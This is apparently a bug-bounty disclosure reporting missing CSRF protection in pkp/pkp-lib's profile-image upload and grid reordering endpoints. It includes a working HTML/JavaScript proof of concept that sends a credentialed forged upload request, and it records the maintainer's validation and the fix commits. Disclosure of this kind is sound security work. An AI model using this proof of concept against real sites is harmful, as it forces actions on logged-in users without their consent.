Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on

Oct 16th 2021


Description

No CSRF in upload profile too: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:

/index.php/e/$$$call$$$/grid/settings/submission-checklist/submission-checklist-grid/save-sequence

/index.php/e/$$$call$$$/grid/settings/genre/genre-grid/save-sequence

POC for upload files

<html>
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://10.0.2.15:8000/index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = "true";
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; ; filename=\"cat.jpg\"\r\n" + 
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
          "-----------------------------moxieboundary1634260375680--\r\n"
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking users to change their user profile picture.

Occurrences

no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back a year ago
haxatron modified the report
a year ago
Alec Smecher validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher confirmed that a fix has been merged on 169885 a year ago
Alec Smecher has been awarded the fix bounty
Alec Smecher
a year ago

Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:

  • https://github.com/pkp/pkp-lib/commit/169885a1de6554b519f264b213d91d4847d1a088
  • https://github.com/pkp/pkp-lib/commit/30180492367caf94919d870032795b201952d9e2
to join this conversation